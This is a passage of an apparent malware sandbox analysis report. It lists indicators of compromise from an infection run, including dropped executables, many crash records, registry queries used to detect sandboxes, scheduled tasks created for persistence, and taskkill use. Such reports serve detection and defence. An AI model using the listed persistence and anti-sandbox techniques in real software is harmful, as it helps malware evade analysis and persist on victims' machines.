ikf96lKZ4JnA_XIfWuND_5Rg.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe ikf96lKZ4JnA_XIfWuND_5Rg.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe TqUaKAjOaYYSlALxbRqe2mlv.exe File created C:\Program Files (x86)\FarLabUninstaller\is-V5NGS.tmp setup_2.tmp File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe forfiles.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe FQV7LsPiUL4WOzdhHCs4E9xN.exe File created C:\Program Files (x86)\IDownload\is-E779M.tmp IDownload.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\inst001.exe TqUaKAjOaYYSlALxbRqe2mlv.exe File opened for modification C:\Program Files (x86)\IDownload\ICSharpCode.SharpZipLib.dll IDownload.tmp File created C:\Program Files (x86)\Common Files\Saelozhushofa.exe 46807GHF____.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe TqUaKAjOaYYSlALxbRqe2mlv.exe File created C:\Program Files\Microsoft Office\SEMYQDCVYL\IDownload.exe el34zAN.exe File created C:\Program Files (x86)\PowerControl\Mysasywosi.exe el34zAN.exe File created C:\Program Files (x86)\IDownload\is-MM9N4.tmp IDownload.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-4R3FU.tmp ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-7NA3T.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe WerFault.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe ikf96lKZ4JnA_XIfWuND_5Rg.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe FQV7LsPiUL4WOzdhHCs4E9xN.exe File created C:\Program Files (x86)\PowerControl\Mysasywosi.exe.config el34zAN.exe File opened for modification C:\Program Files (x86)\IDownload\TabStrip.dll IDownload.tmp File created C:\Program Files (x86)\IDownload\unins000.dat IDownload.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\IDownload\is-92RO4.tmp IDownload.tmp File opened for modification C:\Program Files (x86)\IDownload\downloads.xml IDownload.App.exe File created C:\Program Files (x86)\IDownload\is-SCIIK.tmp IDownload.tmp -
Drops file in Windows directory 33 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI4D7A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICC61.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFA92D56523B54D11A.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIE01B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI59F.tmp msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp.tmp WerFault.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSI2E7C.tmp msiexec.exe File opened for modification C:\Windows\assembly\Desktop.ini IDownload.App.exe File created C:\Windows\Installer\f74a36a.msi msiexec.exe File opened for modification C:\Windows\Installer\MSID8E6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBDBA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6D9A.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF3564CFA4EF9A7044.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI13AA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2965.tmp msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp.tmp WerFault.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\f74a36a.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIB53C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID0B8.tmp msiexec.exe File opened for modification C:\Windows\assembly IDownload.App.exe File opened for modification C:\Windows\Installer\MSIE01C.tmp msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI358C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5B46.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\SystemTemp\~DFB092BA733B1518ED.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI61D1.tmp msiexec.exe File created C:\Windows\assembly\Desktop.ini IDownload.App.exe File created C:\Windows\SystemTemp\~DF0957ADD9F8FA00A7.TMP msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 55 IoCs
pid pid_target Process procid_target 4136 3284 WerFault.exe 95 1668 4652 WerFault.exe 98 2600 860 WerFault.exe 99 5448 772 WerFault.exe 93 5872 5148 WerFault.exe 117 5232 5188 WerFault.exe 118 4176 3416 WerFault.exe 142 6044 5408 WerFault.exe 122 772 1668 WerFault.exe 146 5388 1160 WerFault.exe 155 6000 5880 WerFault.exe 164 1384 5292 WerFault.exe 140 4648 5008 WerFault.exe 116 740 5768 WerFault.exe 156 2480 5292 WerFault.exe 202 3012 5196 WerFault.exe 250 6260 4076 WerFault.exe 256 6428 1560 WerFault.exe 263 6440 2224 WerFault.exe 269 2392 3696 WerFault.exe 240 4076 6780 WerFault.exe 283 832 7732 WerFault.exe 333 1404 6772 WerFault.exe 284 8404 6224 WerFault.exe 303 8920 3560 WerFault.exe 300 8276 6812 WerFault.exe 291 7248 6736 WerFault.exe 281 3928 7556 WerFault.exe 321 8896 7548 WerFault.exe 322 8940 6932 WerFault.exe 470 5392 8928 WerFault.exe 458 2976 8128 WerFault.exe 469 6968 6812 WerFault.exe 456 5748 8824 WerFault.exe 473 2628 1880 WerFault.exe 465 8064 8364 WerFault.exe 548 9544 5976 WerFault.exe 570 5900 4548 WerFault.exe 597 1412 3152 WerFault.exe 616 9636 8688 WerFault.exe 613 8528 6052 WerFault.exe 542 3820 5940 WerFault.exe 539 21360 7788 WerFault.exe 557 8244 7944 WerFault.exe 555 10792 5540 WerFault.exe 671 10868 9708 WerFault.exe 674 12456 12136 WerFault.exe 686 14392 13592 WerFault.exe 705 14956 14784 WerFault.exe 715 15368 14724 WerFault.exe 713 17244 16856 WerFault.exe 732 18104 17068 WerFault.exe 733 18216 17720 WerFault.exe 738 18652 17508 WerFault.exe 736 18780 18360 WerFault.exe 745 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI nxfOBZ7N7BTND0tSNqWtavVB.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI nxfOBZ7N7BTND0tSNqWtavVB.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI nxfOBZ7N7BTND0tSNqWtavVB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F7C5.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F7C5.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F7C5.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 5646.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz 3439763.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 installer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision installer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz nxfOBZ7N7BTND0tSNqWtavVB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier powershell.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Creates scheduled task(s) 1 TTPs 22 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3900 schtasks.exe 1564 schtasks.exe 5100 schtasks.exe 6668 schtasks.exe 8604 schtasks.exe 8468 schtasks.exe 4004 schtasks.exe 3640 schtasks.exe 6292 schtasks.exe 3804 schtasks.exe 9676 schtasks.exe 10052 schtasks.exe 8392 schtasks.exe 9140 schtasks.exe 8848 schtasks.exe 8132 schtasks.exe 4824 schtasks.exe 5068 schtasks.exe 6700 schtasks.exe 4472 schtasks.exe 4068 schtasks.exe 2612 schtasks.exe -
Enumerates system info in registry 2 TTPs 64 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU nxfOBZ7N7BTND0tSNqWtavVB.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName SimplInst.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 3439763.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SimplInst.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU installer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SimplInst.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS nxfOBZ7N7BTND0tSNqWtavVB.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS installer.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 3439763.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName SimplInst.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Kills process with taskkill 5 IoCs
pid Process 6288 taskkill.exe 5796 taskkill.exe 3856 taskkill.exe 8196 taskkill.exe 9208 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Process not Found Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Process not Found Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings taskkill.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ gdgame.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Process not Found -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d